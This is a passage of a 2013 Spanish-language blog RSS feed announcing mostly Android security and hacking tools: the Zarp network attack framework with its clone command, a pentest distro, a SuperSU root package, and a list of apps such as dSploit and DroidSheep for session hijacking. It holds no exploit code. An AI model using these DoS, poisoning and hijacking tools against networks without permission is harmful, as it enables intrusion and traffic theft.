class="hps"&gt;HTTP&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;y más.&lt;/span&gt; &lt;span class="hps"&gt;Los &lt;b&gt;ataques DoS&lt;/b&gt;&lt;/span&gt; &lt;span class="hps"&gt;se incluyen&lt;/span&gt; &lt;span class="hps"&gt;para noquear a&lt;/span&gt; &lt;span class="hps"&gt;varios sistemas&lt;/span&gt; &lt;span class="hps"&gt;y aplicaciones.&lt;/span&gt; &lt;span class="hps"&gt;Estas herramientas&lt;/span&gt; &lt;span class="hps"&gt;abren la posibilidad&lt;/span&gt; &lt;span class="hps"&gt;para escenarios&lt;/span&gt; &lt;span class="hps"&gt;muy complejos&lt;/span&gt; &lt;span class="hps"&gt;de ataque&lt;/span&gt; &lt;span class="hps"&gt;en las redes&lt;/span&gt; &lt;span class="hps"&gt;vivas&lt;/span&gt; &lt;span class="hps"&gt;rápida, limpia&lt;/span&gt; &lt;span class="hps"&gt;y&lt;/span&gt; &lt;span class="hps"&gt;silenciosamente&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Herramientas&lt;/b&gt;:&lt;br /&gt;&lt;i&gt;· Poisoners&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· DoS Attack&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Sniffer&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Scanner&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Parameter&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Services&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Sessions&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga:&lt;/b&gt;&lt;br /&gt;&lt;i&gt;git clone &lt;a href="git://github.com/hatRiot/zarp.git"&gt;git://github.com/hatRiot/zarp.git&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Actualización:&lt;/b&gt;&lt;br /&gt;&lt;i&gt;sudo python zarp.py --update&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Wiki de Zarp: &lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;a href="https://defense.ballastsecurity.net/wiki/index.php/Zarp"&gt;https://defense.ballastsecurity.net/wiki/index.php/Zarp&lt;/a&gt; &lt;/i&gt;</description><link>http://kode-labs.blogspot.com/2013/07/zarp-network-attack-framework_10.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-gK21LLP1Ueo/Ud16Ne33NJI/AAAAAAAAA1g/VApeMTrVotg/s72-c/Sin+t%C3%ADtulo.png" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-5279188139208800789</guid><pubDate>Mon, 08 Jul 2013 14:11:00 +0000</pubDate><atom:updated>2013-07-08T09:41:33.466-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>UbnHD2: Distro Pentesting para Android</title><description>&lt;span class="" id="result_box" lang="es"&gt;&lt;b&gt;&lt;span class="hps"&gt;UbnHD2&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;es un&lt;/span&gt; &lt;span class="hps"&gt;sistema de seguridad basando en&lt;/span&gt; &lt;b&gt;&lt;i&gt;&lt;span class="hps"&gt;ubuntu&lt;/span&gt; &lt;span class="hps"&gt;/ debian&lt;/span&gt;&lt;/i&gt;&lt;/b&gt; &lt;span class="hps"&gt;centrado&lt;/span&gt; para &lt;span class="hps"&gt;pentest&lt;/span&gt; &lt;span class="hps"&gt;que se ejecuta&lt;/span&gt; &lt;span class="hps"&gt;de forma nativa en&lt;/span&gt; &lt;span class="hps"&gt;el&lt;/span&gt; &lt;b&gt;&lt;span class="hps"&gt;HTC&lt;/span&gt; &lt;span class="hps"&gt;HD2.&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="http://a.fsdn.com/con/app/proj/ubnhd2/screenshots/screenshot12hy.png" class="decoded" height="240" src="http://a.fsdn.com/con/app/proj/ubnhd2/screenshots/screenshot12hy.png" width="400" /&gt; &lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;Caracteristicas:&lt;/b&gt;&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;· Tor &amp;amp; Vidalia onboard and working over 3G &amp;amp; Wifi :-)&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;· Based on Ubuntu 10.10 Maverick Meerkat, Kernel 2.6.32.15 (ARM)&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;· X.org 7.5, GNOME 2.32.0 &amp;amp; Cairo-Dock 2.2.0&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;· USB-OTG, 3G Network &amp;amp; WiFi (Drivers not included, proprietary, check XDA Forum)&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;i&gt;· Perl 5.10.1, Ruby 4.5, Python 2.6.6 and more than 170 Pentest Tools preloaded&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;Pagina Oficial:&lt;/b&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;a href="http://sourceforge.net/projects/ubnhd2/"&gt;http://sourceforge.net/projects/ubnhd2/&lt;/a&gt;&lt;i&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;Descarga:&lt;/b&gt;&lt;i&gt; &lt;/i&gt;&lt;a href="http://sourceforge.net/projects/ubnhd2/files/latest/download"&gt;http://sourceforge.net/projects/ubnhd2/files/latest/download&lt;/a&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/07/ubnhd2-distro-pentesting-para-android.html</link><author>noreply@blogger.com (Kodeinfect)</author><enclosure length="2007204733" type="application/octet-stream" url="http://sourceforge.net/projects/ubnhd2/files/latest/download"/><itunes:explicit/><itunes:subtitle>UbnHD2 es un sistema de seguridad basando en ubuntu / debian centrado para pentest que se ejecuta de forma nativa en el HTC HD2. Caracteristicas:&amp;nbsp;· Tor &amp;amp; Vidalia onboard and working over 3G &amp;amp; Wifi :-)· Based on Ubuntu 10.10 Maverick Meerkat, Kernel 2.6.32.15 (ARM)&amp;nbsp;· X.org 7.5, GNOME 2.32.0 &amp;amp; Cairo-Dock 2.2.0· USB-OTG, 3G Network &amp;amp; WiFi (Drivers not included, proprietary, check XDA Forum)· Perl 5.10.1, Ruby 4.5, Python 2.6.6 and more than 170 Pentest Tools preloaded Pagina Oficial: http://sourceforge.net/projects/ubnhd2/Descarga: http://sourceforge.net/projects/ubnhd2/files/latest/download</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>UbnHD2 es un sistema de seguridad basando en ubuntu / debian centrado para pentest que se ejecuta de forma nativa en el HTC HD2. Caracteristicas:&amp;nbsp;· Tor &amp;amp; Vidalia onboard and working over 3G &amp;amp; Wifi :-)· Based on Ubuntu 10.10 Maverick Meerkat, Kernel 2.6.32.15 (ARM)&amp;nbsp;· X.org 7.5, GNOME 2.32.0 &amp;amp; Cairo-Dock 2.2.0· USB-OTG, 3G Network &amp;amp; WiFi (Drivers not included, proprietary, check XDA Forum)· Perl 5.10.1, Ruby 4.5, Python 2.6.6 and more than 170 Pentest Tools preloaded Pagina Oficial: http://sourceforge.net/projects/ubnhd2/Descarga: http://sourceforge.net/projects/ubnhd2/files/latest/download</itunes:summary><itunes:keywords>Android, Hacking</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-6247820531249199437</guid><pubDate>Fri, 05 Jul 2013 20:40:00 +0000</pubDate><atom:updated>2013-07-05T16:13:10.523-04:30</atom:updated><title>Disponible - Root para Android 4.3 Jelly Bean</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-czWVFbsMeJM/Udctf53BkbI/AAAAAAAAA00/Q-0LpUJOje8/s1600/XD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-czWVFbsMeJM/Udctf53BkbI/AAAAAAAAA00/Q-0LpUJOje8/s1600/XD.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;De la mano de &lt;b&gt;Chainfire&lt;/b&gt;, el desarrollador de aplicaciones como &lt;b&gt;CF Auto Root &lt;/b&gt;y  &lt;b&gt;SuperSU&lt;/b&gt;, que ahora nos trae la forma de &lt;i&gt;obtener acceso root&lt;/i&gt; en los &lt;b&gt;Samsung Galaxy S4 Google Edition&lt;/b&gt; con &lt;b&gt;Android 4.3&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Según el autor&lt;/b&gt;:&lt;br /&gt;&lt;i&gt;El exploit funciona perfectamente en el dispositivo de Samsung y hasta  ahora no se ha detectado ningún problema. De este modo los usuarios SGS4  ahora pueden librarse de algunas cadenas e instalar aplicaciones para  usuarios root.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Proceso&lt;/b&gt;:&lt;br /&gt;Es muy simple, bastaría con instalar &lt;b&gt;&lt;i&gt;recovery&lt;/i&gt;&lt;/b&gt; y luego &lt;b&gt;&lt;i&gt;flashear&lt;/i&gt;&lt;/b&gt; el archivo ZIP que nos permitirá tener &lt;i&gt;el acceso root a nuestro terminal&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;: &lt;br /&gt;&lt;a href="http://download.chainfire.eu/340/SuperSU/SuperSU-JWR66N-S005-130625-1.41.zip?retrieve_file=1"&gt;SuperSU-JWR66N-S005-130625-1.41&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Un saludo y a disfrutar de nuestro terminal sin cadenas y con full acceso ;);)&lt;br /&gt;&lt;br /&gt;</description><link>http://kode-labs.blogspot.com/2013/07/disponible-root-para-android-43-jelly.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/-czWVFbsMeJM/Udctf53BkbI/AAAAAAAAA00/Q-0LpUJOje8/s72-c/XD.png" width="72"/><enclosure length="1167829" type="application/octet-stream" url="http://download.chainfire.eu/340/SuperSU/SuperSU-JWR66N-S005-130625-1.41.zip?retrieve_file=1"/><itunes:explicit/><itunes:subtitle>De la mano de Chainfire, el desarrollador de aplicaciones como CF Auto Root y SuperSU, que ahora nos trae la forma de obtener acceso root en los Samsung Galaxy S4 Google Edition con Android 4.3. Según el autor: El exploit funciona perfectamente en el dispositivo de Samsung y hasta ahora no se ha detectado ningún problema. De este modo los usuarios SGS4 ahora pueden librarse de algunas cadenas e instalar aplicaciones para usuarios root. Proceso: Es muy simple, bastaría con instalar recovery y luego flashear el archivo ZIP que nos permitirá tener el acceso root a nuestro terminal. Descarga: SuperSU-JWR66N-S005-130625-1.41 Un saludo y a disfrutar de nuestro terminal sin cadenas y con full acceso ;);)</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>De la mano de Chainfire, el desarrollador de aplicaciones como CF Auto Root y SuperSU, que ahora nos trae la forma de obtener acceso root en los Samsung Galaxy S4 Google Edition con Android 4.3. Según el autor: El exploit funciona perfectamente en el dispositivo de Samsung y hasta ahora no se ha detectado ningún problema. De este modo los usuarios SGS4 ahora pueden librarse de algunas cadenas e instalar aplicaciones para usuarios root. Proceso: Es muy simple, bastaría con instalar recovery y luego flashear el archivo ZIP que nos permitirá tener el acceso root a nuestro terminal. Descarga: SuperSU-JWR66N-S005-130625-1.41 Un saludo y a disfrutar de nuestro terminal sin cadenas y con full acceso ;);)</itunes:summary></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-1942744754107977466</guid><pubDate>Fri, 05 Jul 2013 13:38:00 +0000</pubDate><atom:updated>2013-07-05T09:08:23.502-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><title>SuperBeam: Transfiere varios archivos a la vez con WifiDirect</title><description>&lt;img alt="https://lh6.ggpht.com/I1Lr58b5wFo5C_VEUD-By8GL03bJ-1MLh0uzlvAmjfKjKwQVZWWIQPIlpv7JOBJUG-53=w705" class="decoded" src="https://lh6.ggpht.com/I1Lr58b5wFo5C_VEUD-By8GL03bJ-1MLh0uzlvAmjfKjKwQVZWWIQPIlpv7JOBJUG-53=w705" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span style="font-family: inherit;"&gt;&lt;span class="" id="result_box" lang="es" style="font-size: small;"&gt;&lt;b&gt;&lt;span class="hps"&gt;Superbeam&lt;/span&gt;&lt;/b&gt; &lt;span class="hps"&gt;es la manera&lt;/span&gt; &lt;span class="hps"&gt;más fácil y rápida&lt;/span&gt; &lt;span class="hps"&gt;de compartir&lt;/span&gt; &lt;span class="hps"&gt;archivos grandes entre&lt;/span&gt; &lt;span class="hps"&gt;los dispositivos Android&lt;/span&gt; &lt;span class="hps"&gt;con&lt;/span&gt; &lt;span class="hps"&gt;WiFi&lt;/span&gt; &lt;span class="hps"&gt;directa.&lt;/span&gt; &lt;span class="hps"&gt;Usted puede&lt;/span&gt; &lt;span class="hps"&gt;emparejar&lt;/span&gt; &lt;span class="hps"&gt;los dispositivos&lt;/span&gt; &lt;span class="hps"&gt;dispositivos que utilizan&lt;/span&gt; &lt;span class="hps"&gt;códigos QR&lt;/span&gt; &lt;span class="hps"&gt;(con&lt;/span&gt; &lt;span class="hps"&gt;lector de código de&lt;/span&gt; &lt;span class="hps"&gt;QR&lt;/span&gt; &lt;span class="hps"&gt;incluidas) o&lt;/span&gt; &lt;span class="hps"&gt;NFC&lt;/span&gt;, &lt;span class="hps"&gt;si los dispositivos&lt;/span&gt; &lt;span class="hps"&gt;soportan, n&lt;/span&gt;&lt;span class="hps"&gt;o hay&lt;/span&gt; &lt;span class="hps"&gt;más clics&lt;/span&gt; &lt;span class="hps"&gt;y aprobaciones&lt;/span&gt; &lt;span class="hps"&gt;manuales&lt;/span&gt; &lt;span class="hps"&gt;para las conexiones&lt;/span&gt;. &lt;span class="hps"&gt;Superbeam&lt;/span&gt; &lt;span class="hps"&gt;hace que&lt;/span&gt; &lt;span class="hps"&gt;compartir archivos&lt;/span&gt; &lt;span class="hps"&gt;como&lt;/span&gt; &lt;span class="hps"&gt;cómodo y rápido&lt;/span&gt; &lt;span class="hps"&gt;como debería haber&lt;/span&gt; &lt;span class="hps"&gt;sido,&lt;/span&gt; &lt;span class="hps"&gt;porque ya es&lt;/span&gt; &lt;span class="hps"&gt;2013!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;  &lt;iframe allowfullscreen="" frameborder="0" height="480" src="//www.youtube.com/embed/vBOaI9-zjls" width="640"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Descarga: &lt;a class="bbc_link" href="https://play.google.com/store/apps/details?id=com.majedev.superbeam" target="_blank"&gt;SuperBeam (GooglePlay)&lt;/a&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2013/07/superbeam-transfiere-varios-archivos-la.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://lh6.ggpht.com/I1Lr58b5wFo5C_VEUD-By8GL03bJ-1MLh0uzlvAmjfKjKwQVZWWIQPIlpv7JOBJUG-53=s72-w705-c" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-7971886401664949744</guid><pubDate>Thu, 04 Jul 2013 18:40:00 +0000</pubDate><atom:updated>2013-07-04T14:10:13.804-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>MEGA: Disponible para Android</title><description>&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5HawmLSHERc/UdXBYRpgjAI/AAAAAAAAA0k/kWaBt3d0Q5A/s640/mega_android.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://1.bp.blogspot.com/-5HawmLSHERc/UdXBYRpgjAI/AAAAAAAAA0k/kWaBt3d0Q5A/s400/mega_android.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Ya se encuentra disponible la aplicación de &lt;a href="https://mega.co.nz/"&gt;&lt;b&gt;MEGA&lt;/b&gt;&lt;/a&gt; para &lt;b&gt;Android&lt;/b&gt;. &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;Nos ofrecen 50GB gratuitos para almacenar en la nube, también incluye sincronización automática de videos y fotografía&lt;strong&gt;s&lt;/strong&gt; hechas desde nuestro dispositivo, tal y como hace Dropbox.entre las características de la aplicación tenemos:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Buscador interno&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Descarga y subida de archivos&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Sincronización de cámara automática configurable&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Crear y compartir enlaces de los archivos en nuestra cuenta&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Borrar, mover y renombrar archivos&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Crear y gestionar carpetas&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;La aplicación requiere una versión de &lt;i&gt;Android 2.3 o Superior &lt;/i&gt;para poder ejecutarse.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Screenshots&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="mega app" class="aligncenter size-large wp-image-104856" height="374" src="http://www.elandroidelibre.com/wp-content/uploads/2013/07/mega-app-660x374.jpg" width="660" /&gt;&lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;:&lt;br /&gt;&lt;a href="https://play.google.com/store/apps/details?id=com.flyingottersoftware.mega"&gt;Google Play (Mega)&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/07/mega-disponible-para-android.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-5HawmLSHERc/UdXBYRpgjAI/AAAAAAAAA0k/kWaBt3d0Q5A/s72-c/mega_android.jpg" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-1496726925009466482</guid><pubDate>Thu, 04 Jul 2013 01:14:00 +0000</pubDate><atom:updated>2013-07-03T20:44:28.038-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Bugtroid: Interesante proyecto de la mano de BugTraq</title><description>&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/vue2hpGesXw" width="560"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;Como lo dice el vídeo de arriba, esto se viene bien bueno este proyecto de la mano de los compañeros de &lt;a href="https://twitter.com/BugtraqTeam"&gt;&lt;b&gt;@BugtraqTeam&lt;/b&gt;&lt;/a&gt;, bajo el nombre de &lt;b&gt;#Bugtroid&lt;/b&gt; se quiere presentar esta aplicación &lt;i&gt;(para smartphones) &lt;/i&gt;con las siguientes características.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Anonimato&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Seguridad Wireles&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Sniffers&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Perl&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Python&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Ruby&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Pentesting&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Forensic&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· Brute Force&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;· DDoS &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Solo queda la espera de lo que será este proyecto ;) como ya dije antes solo deben estar pendientes de las noticias en el Twitter ya mencionado antes o simplemente visitar la pagina web oficial del proyecto: &lt;a href="http://www.bugtraq-team.com/"&gt;&lt;i&gt;http://www.bugtraq-team.com/&lt;/i&gt;&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/07/bugtroid-interesante-proyecto-de-la.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-2365586579430144721</guid><pubDate>Wed, 03 Jul 2013 22:42:00 +0000</pubDate><atom:updated>2013-07-04T09:30:09.412-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Hacking en Android: Descubre Estas Excelentes Aplicaciones</title><description>&lt;div style="text-align: left;"&gt;&lt;img alt="http://3.bp.blogspot.com/-HGTv1zrcOaA/UJQCo1KSwZI/AAAAAAAAAg8/Hnns_EGHfTI/s1600/ic_launcher.png" class="decoded" src="http://3.bp.blogspot.com/-HGTv1zrcOaA/UJQCo1KSwZI/AAAAAAAAAg8/Hnns_EGHfTI/s1600/ic_launcher.png" /&gt;&amp;nbsp; &lt;/div&gt;&lt;pre&gt;Nombre: &lt;b&gt;dSploit&lt;/b&gt;&lt;br /&gt;Pagina Oficial:&amp;nbsp;&lt;a href="http://www.dsploit.net/"&gt;http://www.dsploit.net/&lt;/a&gt;&lt;br /&gt;Descripción: Suite de pentesting y análisis de redes&lt;a href="https://github.com/evilsocket/dsploit"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="http://uceka.files.wordpress.com/2013/04/zant.jpg?w=584" class="decoded" height="54" src="http://uceka.files.wordpress.com/2013/04/zant.jpg?w=584" width="200" /&gt; &lt;/pre&gt;&lt;pre&gt;Nombre: &lt;b&gt;zAnti&lt;/b&gt;&lt;br /&gt;Pagina Oficial:&amp;nbsp;&lt;a href="http://www.zimperium.com/"&gt;http://www.zimperium.com/&lt;/a&gt;&lt;br /&gt;Descripción: Suite de pentesting y análisis de redes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="droidS" class="alignnone size-full wp-image-450" height="57" src="http://uceka.files.wordpress.com/2013/03/droids.jpg?w=584&amp;amp;h=106" width="320" /&gt; &lt;/pre&gt;&lt;pre&gt;Nombre: &lt;b&gt;Droid Sheep&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://droidsheep.de/"&gt;http://droidsheep.de/&lt;/a&gt;&lt;br /&gt;Descripción: Hijacking&lt;br /&gt;&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;br /&gt;&lt;img alt="http://uceka.files.wordpress.com/2013/04/networkspoofer.png?w=96" class="decoded" src="http://uceka.files.wordpress.com/2013/04/networkspoofer.png?w=96" /&gt;&lt;br /&gt;&lt;pre&gt;Nombre: &lt;b&gt;Network Spoofer&lt;/b&gt;&lt;br /&gt;Pagina Oficial:&amp;nbsp;&lt;a href="http://digitalsquid.co.uk/netspoof/"&gt;http://digitalsquid.co.uk/netspoof/&lt;/a&gt;&lt;br /&gt;Descripción: Suite de pentesting y análisis de redes&lt;br /&gt;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="http://cdn1.aptoide.com/imgs/0/9/1/091aa2b7126b97fe55bbab993eb47810.png" class="decoded" height="70" src="http://cdn1.aptoide.com/imgs/0/9/1/091aa2b7126b97fe55bbab993eb47810.png" width="70" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre: &lt;b&gt;Intercepter-NG&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://intercepter.nerf.ru/#down"&gt;http://intercepter.nerf.ru/#down&lt;/a&gt;&lt;br /&gt;Descripción: Herramienta para el análisis de redes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="http://2.bp.blogspot.com/-zhDY7ji7_gU/UTs7n82arkI/AAAAAAAABmY/QN1k2VCA9aQ/s1600/revenssis_logo.png" class="decoded" height="96" src="http://2.bp.blogspot.com/-zhDY7ji7_gU/UTs7n82arkI/AAAAAAAABmY/QN1k2VCA9aQ/s200/revenssis_logo.png" width="96" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre: &lt;b&gt;Revenssis Penetration Testing Suite&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://sourceforge.net/projects/revenssis/"&gt;http://sourceforge.net/projects/revenssis/&lt;/a&gt;&lt;br /&gt;Descripción: Suite de pentesting y análisis de redes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img height="96" src="https://lh3.ggpht.com/9Oa7ppxo_tQT0sBHoZTjq4f5RnYiggTIQMZnRbBKMehVr5tT4tp6lf8i03-erIn-jqLr=w124" width="96" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; Biteshark&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://www.facebook.com/bitSharkAndroid"&gt;https://www.facebook.com/bitSharkAndroid&lt;/a&gt;&lt;br /&gt;Descripción: Capturador de paquetes y análisis de redes&lt;/pre&gt;&lt;br /&gt;&lt;img alt="http://icongal.com/gallery/image/270734/lamp_bulb_light_support_tool_repair_light_bulb_app_guide_direct_idea.png" class="decoded" src="http://icongal.com/gallery/image/270734/lamp_bulb_light_support_tool_repair_light_bulb_app_guide_direct_idea.png" /&gt;&lt;br /&gt;&lt;pre&gt;Nombre:&lt;b&gt; Smartphone Pentest Framework&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://www.bulbsecurity.com/smartphone-pentest-framework/download/"&gt;http://www.bulbsecurity.com/&lt;/a&gt;&lt;br /&gt;Descripción: Suite de pentesting para teléfonos inteligentes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img height="80" itemprop="image" src="https://lh4.ggpht.com/Ak4CdgJu0c0KllzezQAzNYiC9FuI8wOzWd5KH_5T4BLGPnbXKCVsMsJD65DevrGUuyk=w124" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; Shark For Root&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://play.google.com/store/apps/details?id=lv.n3o.shark"&gt;Google Play (Shark For Root)&lt;/a&gt;&lt;br /&gt;Descripción: Capturador de paquetes y análisis de redes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img height="80" src="https://lh5.ggpht.com/ALPwyVsyTxwajQixKYI9_gHH_VB1l9n7xe5RRYgHRY8l_sldFOS0JWYJPlqQVyio=w124" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; Fing&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://www.overlooksoft.com/"&gt;http://www.overlooksoft.com/&lt;/a&gt;&lt;br /&gt;Descripción: Network Discovery, Scanner de servicios&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="http://1.bp.blogspot.com/-ewzSd49-czg/UGaMGv1iJYI/AAAAAAAAAZk/oUq24ooSu5g/s1600/hi-256-0-0485206a7199725302f0156f14a9f7a683df9336.png" class="decoded" height="80" 